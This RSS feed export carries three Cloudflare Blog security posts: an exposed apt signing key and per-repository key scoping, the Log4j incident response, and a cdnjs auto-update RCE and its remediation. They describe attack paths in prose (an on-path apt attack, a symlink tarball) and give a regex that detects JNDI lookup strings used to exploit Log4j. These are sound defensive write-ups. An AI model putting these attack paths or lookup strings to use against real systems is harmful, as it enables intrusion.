
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Sat, 04 Apr 2026 11:17:24 GMT</lastBuildDate>
        <item>
            <title><![CDATA[An exposed apt signing key and how to improve apt security]]></title>
            <link>https://blog.cloudflare.com/dont-use-apt-key/</link>
            <pubDate>Wed, 15 Dec 2021 13:56:03 GMT</pubDate>
            <description><![CDATA[ Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2oaXxSl3ccKgOfLLGNL1n3/2df3207c60020356052f2ade105dccb1/image1-79.png" />
            
            </figure><p>Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please <a href="https://pkg.cloudflareclient.com/install#package-rotation">follow these instructions</a> to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.</p><p>But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.</p>
    <div>
      <h3>The unexpected impact</h3>
      <a href="#the-unexpected-impact">
        
      </a>
    </div>
    <p>At first, we thought that the exposed signing key could only be used by an attacker to forge packages distributed through our package repository. However, when reviewing impact for Debian and Ubuntu platforms we found that our instructions were outdated and insecure. In fact, we found the majority of Debian package repositories on the Internet were providing the same poor guidance: download the GPG key from a website and then either pipe it directly into apt-key or copy it into <code>/etc/apt/trusted.gpg.d/</code>. This method adds the key as a trusted root for software installation from <i>any source</i>. To see why this is a problem, we have to understand how apt downloads and verifies software packages.</p>
    <div>
      <h3>How apt verifies packages</h3>
      <a href="#how-apt-verifies-packages">
        
      </a>
    </div>
    <p>In the early days of Linux, package maintainers wanted to make sure users could trust that the software being installed on their machines came from a trusted source.</p><p>Apt has a list of places to pull packages from (sources) and a method to validate those sources (trusted public keys). Historically, the keys were stored in a single keyring file: <code>/etc/apt/trusted.gpg</code>. Later, as third party repositories became more common, apt could also look inside <code>/etc/apt/trusted.gpg.d/</code> for individual key files.</p><p>What happens when you run apt update? First, apt fetches a signed file called InRelease from each source. Some servers supply separate Release and signature files instead, but they serve the same purpose. InRelease is a file containing metadata that can be used to cryptographically validate every package in the repository. Critically, it is also signed by the repository owner’s private key. As part of the update process, apt verifies that the InRelease file has a valid signature, and that the signature was generated by a trusted root. If everything checks out, a local package cache is updated with the repository’s contents. This cache is directly used when installing packages. The chain of signed InRelease files and cryptographic hashes ensures that each downloaded package hasn’t been corrupted or tampered with along the way.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1D8XXtbwU25pQ7eViP4FFz/98d53164d30968a85a412e592ce7f391/BLOG-895.png" />
            
            </figure>
    <div>
      <h3>A typical third-party repository today</h3>
      <a href="#a-typical-third-party-repository-today">
        
      </a>
    </div>
    <p>For most Ubuntu/Debian users today, this is what adding a third-party repository looks like in practice:</p><ol><li><p>Add a file in <code>/etc/apt/sources.list.d/</code> telling apt where to look for packages.</p></li><li><p>Add the gpg public key to <code>/etc/apt/trusted.gpg.d/</code>, probably via apt-key.</p></li></ol><p>If apt-key is used in the second step, the command typically pops up a deprecation warning, telling you not to use apt-key. There’s a good reason: adding a key like this trusts it for any repository, not just the source from step one. This means if the private key associated with this new source is compromised, attackers can use it to bypass apt’s signature verification and install their own packages.</p><p>What would this type of attack look like? Assume you’ve got a stock Debian setup with a default sources list<sup>1</sup>:</p>
            <pre><code>deb http://deb.debian.org/debian/ bullseye main non-free contrib
deb http://security.debian.org/debian-security bullseye-security main contrib non-free</code></pre>
            <p>At some point you installed a trusted key that was later exposed, and the attacker has the private key. This key was added alongside a source pointing at https, assuming that even if the key is broken an attacker would have to break TLS encryption as well to install software via that route.</p><p>You’re enjoying a hot drink at your local cafe, where someone nefarious has managed to hack the router without your knowledge. They’re able to intercept http traffic and modify it without your knowledge. An auto-update script on your laptop runs <code>apt update</code>. The attacker pretends to be deb.debian.org, and because at least one source is configured to use http, the attacker doesn’t need to break https. They return a modified InRelease file signed with the compromised key, indicating that a newer update of the bash package is available. apt pulls the new package (again from the attacker) and installs it, as root. Now you’ve got a big problem<sup>2</sup>.</p>
    <div>
      <h3>A better way</h3>
      <a href="#a-better-way">
        
      </a>
    </div>
    <p>It seems the way most folks are told to set up third-party Debian repositories is wrong. What if you could tell apt to <a href="https://wiki.debian.org/DebianRepository/UseThirdParty">only trust that GPG key for a specific source</a>? That, combined with the use of https, would significantly reduce the impact of a key compromise. As it turns out, there’s a way to do that! You’ll need to do two things:</p><ol><li><p>Make sure the key isn’t in <code>/etc/apt/trusted.gpg</code> or <code>/etc/apt/trusted.gpg.d/</code> anymore. If the key is its own file, the easiest way to do this is to move it to <code>/usr/share/keyrings/</code>. Make sure the file is owned by root, and only root can write to it. This step is important, because it prevents apt from using this key to check all repositories in the sources list.</p></li><li><p>Modify the sources file in <code>/etc/apt/sources.list.d/</code> telling apt that this particular repository can be “signed by” a specific key. When you’re done, the line should look like this:</p></li></ol>
            <pre><code>deb [signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main</code></pre>
            <p>Some source lists contain other metadata indicating that the source is only valid for certain architectures. If that’s the case, just add a space in the middle, like so:</p>
            <pre><code>deb [amd64 signed-by=/usr/share/keyrings/cloudflare-client.gpg] https://pkg.cloudflareclient.com/ bullseye main</code></pre>
            <p>We’ve updated the instructions on our own repositories for the <a href="https://pkg.cloudflareclient.com/">WARP Client</a> and <a href="https://pkg.cloudflare.com/">Cloudflare</a> with this information, and we hope others will follow suit.</p><p>If you run <code>apt-key list</code> on your own machine, you’ll probably find several keys that are trusted far more than they should be. Now you know how to fix them!</p><p>For those running your own repository, now is a great time to review your installation instructions. If your instructions tell users to curl a public key file and pipe it straight into sudo apt-key, maybe there’s a safer way. While you’re in there, ensuring the package repository supports https is a great way to add an extra layer of security (and if you host your traffic via Cloudflare, <a href="https://www.cloudflare.com/ssl/">it’s easy to set up, and free</a>. You can follow <a href="/cloudflare-repositories-ftw/">this blog post</a> to learn how to properly configure Cloudflare to cache Debian packages).</p><hr /><p><sup>1</sup>RPM-based distros like Fedora, CentOS, and RHEL also use a common trusted GPG store to validate packages, but since they generally use https by default to fetch updates they aren’t vulnerable to this particular attack.</p><p><sup>2</sup>The attack described above requires an active on-path network attacker. If you are using the WARP client or Cloudflare for Teams to tunnel your traffic to Cloudflare, your network traffic cannot be tampered with on local networks.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[WARP]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">3Cmown4J1B4wuqzgTWkNzA</guid>
            <dc:creator>Jeff Hiner</dc:creator>
            <dc:creator>Matt Schulte</dc:creator>
            <dc:creator>Thomas Calderon</dc:creator>
            <dc:creator>Noah Maxwell Kennedy</dc:creator>
        </item>
        <item>
            <title><![CDATA[How Cloudflare security responded to Log4j 2 vulnerability]]></title>
            <link>https://blog.cloudflare.com/how-cloudflare-security-responded-to-log4j2-vulnerability/</link>
            <pubDate>Fri, 10 Dec 2021 23:39:00 GMT</pubDate>
            <description><![CDATA[ Yesterday, December 9, 2021, when a serious vulnerability in the popular Java-based logging package log4j was publicly disclosed, our security teams jumped into action to help respond to the first question and answer the second question. This post explores the second. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, when we learn about a new security vulnerability, we quickly bring together teams to answer two distinct questions: (1) what can we do to ensure our customers’ infrastructures are protected, and (2) what can we do to ensure that our own environment is secure. Yesterday, December 9, 2021, when a serious vulnerability in the popular Java-based logging package <a href="https://logging.apache.org/log4j/2.x/index.html">Log4j</a> was publicly disclosed, our security teams jumped into action to help respond to the first question and answer the second question. This post explores the second.</p><p>We cover the details of how this vulnerability works in a separate blog post: <a href="/inside-the-log4j2-vulnerability-cve-2021-44228/">Inside the Log4j2 vulnerability (CVE-2021-44228)</a>, but in summary, this vulnerability allows an attacker to execute code on a remote server. Because of the widespread use of Java and Log4j, this is likely one of the most serious vulnerabilities on the Internet since both <a href="/searching-for-the-prime-suspect-how-heartbleed-leaked-private-keys/">Heartbleed</a> and <a href="/inside-shellshock/">ShellShock</a>. The vulnerability is listed as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">CVE-2021-44228</a>. The CVE description states that the vulnerability affects Log4j2 &lt;=2.14.1 and is patched in 2.15. The vulnerability additionally <a href="https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126">impacts all versions of log4j 1.x</a>; however, it is End of Life and has other security vulnerabilities that will not be fixed. Upgrading to 2.15 is the recommended action to take. You can also read about how we updated our WAF rules to help protect our customers in this post: <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">CVE-2021-44228 - Log4j RCE 0-day mitigation</a></p>
    <div>
      <h3>Timeline</h3>
      <a href="#timeline">
        
      </a>
    </div>
    <p>One of the first things we do whenever we respond to an incident is start drafting a timeline of events we need to review and understand within the context of the situation. Some examples from our timeline here include:</p><ul><li><p>2021-12-09 16:57 UTC - Hackerone report received regarding Log4j RCE on developers.cloudflare.com</p></li><li><p>2021-12-10 09:56 UTC - First WAF rule shipped to Cloudflare Specials ruleset</p></li><li><p>2021-12-10 10:00 UTC - Formal engineering INCIDENT is opened and work begins to identify areas we need to patch Log4j</p></li><li><p>2021-12-10 10:33 UTC - Logstash deployed with patch to mitigate vulnerability.</p></li><li><p>2021-12-10 10:44 UTC - Second WAF rule is live as part of Cloudflare managed rules</p></li><li><p>2021-12-10 10:50 UTC - ElasticSearch restart begins with patch to mitigate vulnerability</p></li><li><p>2021-12-10 11:05 UTC - ElasticSearch restart concludes and is no longer vulnerable</p></li><li><p>2021-12-10 11:45 UTC - Bitbucket is patched and no longer vulnerable</p></li><li><p>2021-12-10 21:22 UTC - Hackerone report closed as Informative after it was unable to be reproduced</p></li></ul>
    <div>
      <h3>Addressing internal impact</h3>
      <a href="#addressing-internal-impact">
        
      </a>
    </div>
    <p>An important question when dealing with any software vulnerability, and what may actually be the hardest question that every company has to answer in this particular case is: where are all the places that the vulnerable software is actually running?</p><p>If the vulnerability is in a proprietary piece of software licensed by one company to the rest of the world, that is easy to answer - you just find that one piece of software. But in this case that was much harder. Log4j is a widely used piece of software but not one that people who are not Java developers are likely to be familiar with. Our first action was to refamiliarize ourselves with all places in our infrastructure where we were running software on the JVM, in order to determine which software components could be vulnerable to this issue.</p><p>We were able to create an inventory of all software we have running on the JVM using our centralized code repositories. We used this information to research and determine each individual Java application we had, whether it contained Log4j, and which version of Log4j was compiled into it.</p><p>We discovered that our ElasticSearch, LogStash, and Bitbucket contained instances of the vulnerable Log4j package that was between versions 2.0 and 2.14.1. We were able to use the mitigation strategies described in the official Log4j security documentation to patch the issue. For each instance of Log4j we either removed the JndiLookup class from the classpath:</p><p><code>zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class</code></p><p>Or we set the mitigating system property in the log4j configuration:</p><p><code>log4j2.formatMsgNoLookups</code></p><p>We were able to quickly mitigate this issue in these packages using these strategies while waiting for new versions of the packages to be released.</p>
    <div>
      <h3>Reviewing External Reports</h3>
      <a href="#reviewing-external-reports">
        
      </a>
    </div>
    <p>Even before we were done making the list of internal places where the vulnerable software was running, we started by looking at external reports - from HackerOne, our bug bounty program, and a public post in GitHub suggesting that we might be at risk.</p><p>We identified at least two reports that seemed to indicate that Cloudflare was vulnerable and compromised. In one of the reports was the following screenshot:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2qkLHVM69u2bAYEKAWf0UV/34d05486738526729369652f219e4aeb/65876613-4802-4014-B265-A28C1B807847.png" />
            
            </figure><p>This example is targeting our developer documentation hosted at <a href="https://developer.cloudflare.com/">https://developer.cloudflare.com</a>. On the right-hand side, the attacker demonstrates that a DNS query was received for the payload he sent to our server. However, the IP address flagged here is <code>173.194.95.134</code>, a member of a Google owned IPv4 subnet (<code>173.194.94.0/23</code>).</p><p>Cloudflare’s developer documentation is hosted as a Cloudflare Worker and only serves static assets. The repository is <a href="https://github.com/cloudflare/cloudflare-docs">public</a>. The Worker relies on Google’s analytics library as seen <a href="https://github.com/cloudflare/cloudflare-docs/blob/production/developers.cloudflare.com/workers-site/index.js#L48">here</a>, therefore, we hypothesize that the attacker was not receiving a request from Cloudflare but through Google's servers.</p><p>Our backend servers receive logging from Workers, but exploitation was also not possible in this instance as we leverage robust Kubernetes egress policies that prevent calling out to the Internet. The only communication allowed is to a curated set of internal services.</p><p>When we received a similar report in our vulnerability disclosure program while gathering more information, the researcher was unable to reproduce the issue. This further enforced our hypothesis that it was third party servers, and they may have patched the issue.</p>
    <div>
      <h3>Was Cloudflare compromised?</h3>
      <a href="#was-cloudflare-compromised">
        
      </a>
    </div>
    <p>While we were running versions of the software as described above, thanks to our speed of response and defense in depth approach, we do not believe Cloudflare was compromised. We have invested significant efforts into validating this, and we will continue working on this effort until everything is known about this vulnerability. Here is a bit about that part of our efforts.</p><p>As we were working to evaluate and isolate all the contexts in which the vulnerable software might be running and remediate them, we started a separate workstream to analyze whether any of those instances had been exploited.  Our detection and response methodology follows industry standard Incident Response practices and was thoroughly deployed to validate whether any of our assets were indeed compromised. We followed a multi-pronged approach described next.</p>
    <div>
      <h3>Reviewing Internal Data</h3>
      <a href="#reviewing-internal-data">
        
      </a>
    </div>
    <p>Our asset inventory and code scanning tooling allowed us to identify all applications and services reliant on Apache Log4j. While these applications were being reviewed and upgraded if needed, we were performing a thorough scan of these services and hosts. Specifically, the exploit for CVE-2021-44228 relies on particular patterns in log messages and parameters, for example <code>\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+</code>. For each potentially impacted service, we performed a log analysis to expose any attempts at exploitation.</p>
    <div>
      <h3>Reviewing Network Analytics</h3>
      <a href="#reviewing-network-analytics">
        
      </a>
    </div>
    <p>Our network analytics allow us to identify suspicious network behavior that may be indicative of attempted or actual exploitation of our infrastructure. We scrutinised our network data to identify the following:</p><ol><li><p>Suspicious Inbound and Outbound ActivityBy analyzing suspicious inbound and outbound connections, we were able to sweep our environment and identify whether any of our systems were displaying signs of active compromise.</p></li><li><p>Targeted Systems &amp; ServicesBy leveraging pattern analytics against our network data, we uncovered systems and services targeted by threat-actors. This allowed us to perform correlative searches against our asset inventory, and drill down to each host to determine if any of those machines were exposed to the vulnerability or actively exploited.</p></li><li><p>Network IndicatorsFrom the aforementioned analysis, we gained insight into the infrastructure of various threat actors and identified network indicators being utilized in attempted exploitation of this vulnerability. Outbound activity to these indicators was blocked in Cloudflare Gateway.</p></li></ol>
    <div>
      <h3>Reviewing endpoints</h3>
      <a href="#reviewing-endpoints">
        
      </a>
    </div>
    <p>We were able to correlate our log analytics and network analytics workflows to supplement our endpoint analysis. From our findings from both of those analyses, we were able to craft endpoint scanning criteria to identify any additional potentially impacted systems and analyze individual endpoints for signs of active compromise. We utilized the following techniques:</p>
    <div>
      <h5>Signature Based Scanning</h5>
      <a href="#signature-based-scanning">
        
      </a>
    </div>
    <p>We are in the process of deploying custom Yara detection rules to alert on exploitation of the vulnerability. These rules will be deployed in the Endpoint Detection and Response agent running on all of our infrastructure and our centralized Security Information and Events Management (SIEM) tool.</p>
    <div>
      <h5>Anomalous Process Execution and Persistence Analysis</h5>
      <a href="#anomalous-process-execution-and-persistence-analysis">
        
      </a>
    </div>
    <p>Cloudflare continuously collects and analyzes endpoint process events from our infrastructure. We used these events to search for post-exploitation techniques like download of second stage exploits, anomalous child processes, etc.</p><p>Using all of these approaches, we have found no evidence of compromise.</p>
    <div>
      <h3>Third-Party risk</h3>
      <a href="#third-party-risk">
        
      </a>
    </div>
    <p>In the analysis above, we focused on reviewing code and data we generate ourselves. But like most companies, we also rely on software that we have licensed from third parties. When we started our investigation into this matter, we also partnered with the company’s information technology team to pull together a list of each and every primary third-party provider and all sub-processors to inquire about whether they were affected. We’re in the process of receiving and reviewing responses from the providers. Any providers who we deem critical that are impacted by this vulnerability will be disabled and blocked until they are fully remediated.</p>
    <div>
      <h3>Validation that our defense-in depth approach worked</h3>
      <a href="#validation-that-our-defense-in-depth-approach-worked">
        
      </a>
    </div>
    <p>As we responded to this incident, we found several places where our defense in depth approach worked.</p><ol><li><p>Restricting outbound traffic</p></li></ol><p>Restricting the ability to <i>call home</i> is an essential part of the <i>kill-chain</i> to make exploitation of vulnerabilities much harder. As noted above, we leverage Kubernetes network policies to restrict egress to the Internet on our deployments. In this context, it prevents the next-stage of the attack, and the network connection to attacker controlled resources is dropped.</p><p>All of our externally facing services are protected by Cloudflare. The origin servers for these services are set up via authenticated origin pulls. This means that none of the servers are exposed directly to the Internet.</p><p>2.   Using Cloudflare to secure Cloudflare</p><p>All of our internal services are protected by our Zero-trust product, Cloudflare Access. Therefore, once we had patched the limited <a href="https://www.cloudflare.com/learning/security/what-is-an-attack-surface/">attack surface</a> we had identified, any exploit attempts to Cloudflare’s systems or customers leveraging Access would have required the attacker to authenticate.</p><p>And because we have the Cloudflare WAF product deployed as part of our effort to secure Cloudflare using Cloudflare, we benefited from all the work being done to protect our customers. All new WAF rules written to protect against this vulnerability were updated with a default action of <code>BLOCK</code>. Like every other customer who has the WAF deployed, we are now receiving protection without any action required on our side.</p>
    <div>
      <h2>Conclusion</h2>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>While our response to this challenging situation continues, we hope that this outline of our efforts helps others. We are grateful for all the support we have received from within and outside of Cloudflare.</p><p><i>Thank you to Evan Johnson, Anjum Ahuja, Sourov Zaman, David Haynes, and Jackie Keith who also contributed to this blog.</i></p> ]]></content:encoded>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Log4J]]></category>
            <category><![CDATA[Log4Shell]]></category>
            <guid isPermaLink="false">1O7bzj7EcacHO0pyRXeWVY</guid>
            <dc:creator>Rushil Shah</dc:creator>
            <dc:creator>Thomas Calderon</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare's Handling of an RCE Vulnerability in cdnjs]]></title>
            <link>https://blog.cloudflare.com/cloudflares-handling-of-an-rce-vulnerability-in-cdnjs/</link>
            <pubDate>Sat, 24 Jul 2021 12:57:57 GMT</pubDate>
            <description><![CDATA[ Recently, a RCE vulnerability in the way cdnjs’ backend is automatically keeping web resources up to date has been disclosed. Read about how Cloudflare handled the security incident and what will prevent similar exploits in the future. ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://cdnjs.com/">cdnjs</a> provides JavaScript, CSS, images, and fonts assets for websites to reference with more than 4,000 libraries available. By utilizing cdnjs, websites can load faster with less strain on one’s own origin server as files are served directly from Cloudflare’s edge. Recently, a <a href="https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/">blog post</a> detailed a vulnerability in the way cdnjs’ backend automatically keeps the libraries up to date.</p><p>This vulnerability allowed the researcher to execute arbitrary code, granting the ability to modify assets. This blog post details how Cloudflare responded to this report, including the steps we took to block exploitation, investigate potential abuse, and remediate the vulnerability.</p><p>This vulnerability is not related to Cloudflare CDN. The <i>cdnjs</i> project is a platform that leverages Cloudflare’s services, but the vulnerability described below relates to <i>cdnjs</i>’ platform only. To be clear, no existing libraries were modified using this exploit. The researcher published a new package which demonstrated the vulnerability and our investigation concluded that the integrity of all assets hosted on cdnjs remained intact.</p>
    <div>
      <h3>Disclosure Timeline</h3>
      <a href="#disclosure-timeline">
        
      </a>
    </div>
    <p>As outlined in RyotaK’s blog post, the incident began on 2021-04-06. At around 1100 GMT, RyotaK published a package to npm exploiting the vulnerability. At 1129 GMT, cdnjs processed this package, resulting in a leak of credentials. This triggered GitHub alerting which notified Cloudflare of the exposed secrets.</p><p>Cloudflare disabled the auto-update service and revoked all credentials within an hour. In the meantime, our security team received RyotaK’s remote code execution report through HackerOne. A new version of the auto-update tool which prevents exploitation of the vulnerability RyotaK reported was released within 24 hours.</p><p>Having taken action immediately to prevent exploitation, we then proceeded to redesign the auto-update pipeline. Work to completely redesign it was completed on 2021-06-03.</p>
    <div>
      <h3>Blocking Exploitation</h3>
      <a href="#blocking-exploitation">
        
      </a>
    </div>
    <p>Before RyotaK reported the vulnerability via HackerOne, Cloudflare had already taken action. When GitHub notified us that credentials were leaked, one of our engineers took immediate action and revoked them all. Additionally, the GitHub token associated with this service was automatically revoked by GitHub.</p><p>The second step was to bring the vulnerable service offline to prevent further abuse while we investigated the incident. This prevented exploitation but also made it impossible for legitimate developers to publish updates to their libraries. We wanted to release a fixed version of the pipeline used for retrieving and hosting new library versions so that developers could continue to benefit from caching. However, we understood that a stopgap was not a long term fix, and we decided to review the entire current solution to identify a better design that would improve the overall security of cdnjs.</p>
    <div>
      <h3>Investigation</h3>
      <a href="#investigation">
        
      </a>
    </div>
    <p>Any sort of investigation requires access to logs and all components of our pipeline generate extensive logs that prove valuable for forensics efforts. Logs produced by the auto-update process are collected in a <a href="https://github.com/cdnjs/logs">GitHub repository</a> and sent to our logging pipeline. We also collect and retain logs from cdnjs’ Cloudflare account. Our security team began reviewing this information as soon as we received RyotaK’s initial report. Based on access logs, API token usage, and file modification metadata, we are confident that only RyotaK exploited this vulnerability during his research and only on test files. To rule out abuse, we reviewed the list of source IP addresses that accessed the Workers KV token prior to revoking it and only found one, which belongs to the cdnjs auto-update bot.</p><p>The cdnjs team also reviewed files that were pushed to the <a href="https://github.com/cdnjs/cdnjs">cdnjs/cdnjs GitHub repository</a> around that time and found no evidence of any other abuse across cdnjs.</p>
    <div>
      <h3>Remediating the Vulnerability</h3>
      <a href="#remediating-the-vulnerability">
        
      </a>
    </div>
    <p>Around half of the libraries on cdnjs use <a href="https://www.npmjs.com/">npm</a> to auto-update. The primary vector in this attack was the ability to craft a <code>.tar.gz</code> archive with a symbolic link and publish it to the npm registry. When our pipeline extracted the content it would follow symlinks and overwrite local files using the pipeline user privileges. There are two fundamental issues at play here: an attacker can perform <a href="https://en.wikipedia.org/wiki/Directory_traversal_attack">path traversal</a> on the host processing untrusted files, and the process handling the compressed file is <a href="https://en.wikipedia.org/wiki/Principle_of_least_privilege">overly privileged</a>.</p><p>We addressed the path traversal issue by checking that the destination of each file in the tarball will be contained within the target directory that the update process has designated for that package. If the file’s <a href="https://en.wikipedia.org/wiki/Canonicalization">full canonical path</a> doesn’t begin with the destination directory’s full path, we log this as a warning and skip extracting that file. This works fairly well, but as noted in the <a href="https://github.com/cdnjs/tools/pull/220/files#diff-0df1c31d75e0fcc18581b25b3e3e8f7584e0c6acdf38eef60ddcd06d01ac3734R59-R63">comment</a> above this check, if the compressed file uses UTF-8 encoding for filenames, this check may not properly canonicalize the path. If this canonicalization does not occur, the path may contain path traversal, even though it starts with the correct destination path.</p><p>To ensure that other vulnerabilities in cdnjs’ publication pipeline cannot be exploited, we configured an <a href="https://github.com/cdnjs/bot-ansible/pull/24/files">AppArmor profile</a> for it. This limits the <a href="https://man7.org/linux/man-pages/man7/capabilities.7.html">capabilities</a> of the service, so even if an attacker successfully instructed the process to perform an action, the operating system (kernel / security feature) will not allow any action outside of what it is allowed to do.</p><p>For illustration, here’s an example:</p>
            <pre><code>/path/to/bin {
  network,
  signal,
  /path/to/child ix,
  /tmp/ r,
  /tmp/cache** rw,
  ...
}</code></pre>
            <p>In this example, we only allow the binary (/path/to/bin) to:</p><ul><li><p>access all networking</p></li><li><p>use all signals</p></li><li><p>execute /path/to/child (which will inherit the AppArmor profile)</p></li><li><p>read from /tmp</p></li><li><p>read+write under /tmp/cache.</p></li></ul><p>Any attempt to access anything else will be denied. You can find the complete list of capabilities and more information on <a href="https://manpages.ubuntu.com/manpages/precise/en/man5/apparmor.d.5.html">AppArmor’s manual page</a>.</p><p>In the case of cdnjs’ autoupdate tool, we limit execution of applications to a very specific set, and we limit where files can be written.</p><p>Fixing the path traversal and implementing the AppArmor profile prevents similar issues from being exploited. However, having a single layer of defense wasn’t enough. We decided to completely redesign the auto-update process entirely to isolate each step, as well as each library it processes, thus preventing this entire class of attacks.</p>
    <div>
      <h3>Redesigning the system</h3>
      <a href="#redesigning-the-system">
        
      </a>
    </div>
    <p>The main idea behind the redesign of the pipeline was to move away from the monolithic auto-update process. Instead, various operations are done using microservices or daemons which have well-defined scopes. Here’s an overview of the steps:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/NaGyDtiWkMV4J2XvfbReq/4f4aafe30c6fbe07bfd684845dafef3d/image1-18.png" />
            
            </figure><p>First, to detect new library versions, two daemons (for both npm and git based updates) are regularly running. Once a new version has been detected, the files will be downloaded as an archive and placed into the incoming storage bucket.</p><p>Writing a new version in the incoming bucket triggers a function that adds all the information we need to update the library. The function also generates a signed URL allowing for writing in the outgoing bucket, but only in a specific folder for a given library, reducing the blast radius. Finally, a message is placed into a queue to indicate that the new version of the given library is ready to be published.</p><p>A daemon listens for incoming messages and spawns an unprivileged Docker container to handle dangerous operations (archive extraction, minifications, and compression). After the sandbox exits, the daemon will use the signed URL to store the processed files in the outgoing storage bucket.</p><p>Finally, multiple daemons are triggered when the finalized package is written to the outgoing bucket. These daemons publish the assets to cdnjs.cloudflare.com and to the main <a href="https://github.com/cdnjs/cdnjs">cdnjs repository</a>. The daemons also publish the version specific URL, cryptographic hash, and other information to Workers KV, cdnjs.com, and the <a href="https://cdnjs.com/api">API</a>.</p><p>In this revised design, exploiting a similar vulnerability would happen in the sandbox (Docker container) context. The attacker would have access to container files, but nothing else. The container is minimal, ephemeral, has no secrets included, and is dedicated to a single library update, so it cannot affect other libraries’ files.</p>
    <div>
      <h3>Our Commitment to Security</h3>
      <a href="#our-commitment-to-security">
        
      </a>
    </div>
    <p>Beyond maintaining a vulnerability disclosure program, we regularly perform internal security reviews and hire third-party firms to audit the software we develop. But it is through our vulnerability disclosure program that we receive some of the most interesting and creative reports. Each report has helped us improve the security of our services. In this case, we worked with RyotaK to not only address the vulnerability, but to also ensure that their blog post was detailed and accurate. We invite those that find a security issue in any of Cloudflare’s services to report it to us through <a href="https://hackerone.com/cloudflare">HackerOne</a>.</p> ]]></content:encoded>
            <category><![CDATA[CDNJS]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Bug Bounty]]></category>
            <guid isPermaLink="false">666ctQ9OY5rCiI6GZyKm9G</guid>
            <dc:creator>Jonathan Ganz</dc:creator>
            <dc:creator>Thomas Calderon</dc:creator>
            <dc:creator>Sven Sauleau</dc:creator>
        </item>
    </channel>
</rss>